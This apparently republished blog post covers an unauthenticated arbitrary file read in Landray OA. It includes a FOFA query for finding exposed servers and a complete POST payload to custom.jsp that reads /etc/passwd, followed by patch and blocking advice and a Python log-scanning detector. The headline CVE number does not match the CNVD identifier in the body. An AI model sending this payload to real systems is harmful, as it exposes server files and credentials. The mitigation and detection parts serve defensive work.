CVE-2022-34924: Lanling OA foreground arbitrary file reading vulnerability exploitation - Develop Paper
Lanling (Landray) Office Automation (OA), the builds identified by internal patch numbers #133383/#137780, contains an arbitrary file read vulnerability via the component /sys/ui/extend/varkind/custom.jsp.
CNVD recently published this vulnerability as CNVD-2021-28277, with an initial disclosure date of 2021-04-15. Landray OA has multiple vulnerabilities that an attacker can use to gain control of the server. This article selects the Landray OA front-end (pre-authentication) arbitrary file read vulnerability for analysis and exploitation. Link: https://www.cnvd.org.cn/flaw/show/CNVD-2021-28277
Lanling profile: Lanling Software, full name Shenzhen Lanling Software Co., Ltd. (Landray), was founded in Shenzhen Science and Technology Park in 2001. Lanling is a well-known OA platform service provider in China and a leading provider of knowledge management solutions; it is a national high-tech enterprise specializing in knowledge-management consulting, software R&D, implementation and technical services for organizations. Recently, the Landray OA system was found to have an arbitrary file read vulnerability.
1. Vulnerability location
Use the FOFA cyberspace search engine to find targets; FOFA query: app="Landray OA system"
Open the login page of the test site:
The vulnerable path is xxxxx/sys/ui/extend/varkind/custom.jsp, i.e. custom.jsp. It must be requested with the POST method, and the request parameter is var={"body":{"file":"file:///etc/passwd"}}, where the value of file is a file:// URL pointing at the file to read.
Use the HackBar Firefox add-on to set that parameter and send the POST request; opening xxxxx/sys/ui/extend/varkind/custom.jsp then shows the following screen:
2. Vulnerability verification
As can be seen, the contents of the system file /etc/passwd are returned. By changing the file parameter, any file readable by the OA process can be read, which makes this a high-risk vulnerability.
Alternatively, test it with Burp Suite (Repeater recalculates Content-Length when you edit the body):
The vulnerability payload is:
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: xxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=EA419896062AC4B6FE325FF08B8AF36E
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

var={"body":{"file":"file:///etc/passwd"}}
Repair suggestions: Landray OA users should update the system to the latest version or apply the vendor patch. Until the patch is applied, block external access to /sys/ui/extend/varkind/custom.jsp at the reverse proxy or WAF, avoid exposing the OA system directly to the internet, and review the web server access logs for POST requests to that path, since the request body is not logged and the path alone identifies an attempt. Vendor address: https://www.landray.com.cn/
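To act on the log review suggested above, here is an added detection example (not code from the original post or from Landray) that runs over access log lines in the Apache/Nginx "combined" format and flags every POST to the vulnerable JSP, grouping attempts by source IP. The log format, the constructed sample lines (RFC 5737 documentation addresses) and the heuristic that a 200 response with a non-empty body indicates a file was actually read are assumptions.

```python
# Added example (not from the original post or from Landray): scan access logs
# for exploitation attempts against /sys/ui/extend/varkind/custom.jsp.
# Log format, sample lines and the success heuristic are assumptions.
import re
from collections import Counter

VULN_PATH = "/sys/ui/extend/varkind/custom.jsp"

# Combined log format: ip ident user [time] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [15/Apr/2021:10:21:07 +0800] "POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1" 200 2316 "-" "Mozilla/5.0"
198.51.100.7 - - [15/Apr/2021:10:21:09 +0800] "GET /login.jsp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [15/Apr/2021:10:21:12 +0800] "POST /sys/ui/extend/varkind/custom.jsp?x=1 HTTP/1.1" 200 0 "-" "curl/7.68.0"
192.0.2.9 - - [15/Apr/2021:10:22:00 +0800] "POST /SYS/UI/extend/varkind/CUSTOM.JSP HTTP/1.1" 404 196 "-" "python-requests/2.25.1"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop any query string
    return rec


def is_attempt(rec):
    """Any POST to the vulnerable JSP is an attempt: the JSON body with the
    file name is not in the access log, so the path is the only indicator.
    The comparison is case-insensitive so a deployment on a case-insensitive
    filesystem (assumption about the deployment) is not missed."""
    return (
        rec is not None
        and rec["method"] == "POST"
        and rec["path"].lower() == VULN_PATH
    )


def likely_success(rec):
    """Heuristic: the server answered 200 with a non-empty body."""
    return rec["status"] == 200 and rec["size"] > 0


def find_attempts(lines):
    """Return one dict per exploitation attempt found in the given log lines."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if is_attempt(rec):
            hits.append({
                "ip": rec["ip"],
                "time": rec["time"],
                "status": rec["status"],
                "size": rec["size"],
                "success": likely_success(rec),
            })
    return hits


def attackers(hits):
    """Count attempts per source IP."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    found = find_attempts(SAMPLE_LOG.splitlines())
    for h in found:
        print(h)
    print(attackers(found))
```

A 404 for the path (the last sample line) still counts as an attempt: it tells you someone is scanning for this vulnerability even if the JSP is not present or has been blocked. Because the body is not logged, the only way to know which file was read on a successful hit is to correlate with a WAF or reverse proxy that records request bodies.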
Special statement:
Any direct or indirect consequences and losses caused by disseminating or using the information provided in this article are borne by the user alone; the author accepts no responsibility for them.
The author reserves the right to revise and interpret this article. If you reprint or disseminate it, you must preserve it in full, including the copyright notice and all other contents. Without the author's permission, the content of this article may not be modified, extended or shortened, and it may not be used for commercial purposes in any way. Do not use it illegally; it is for learning and reference only.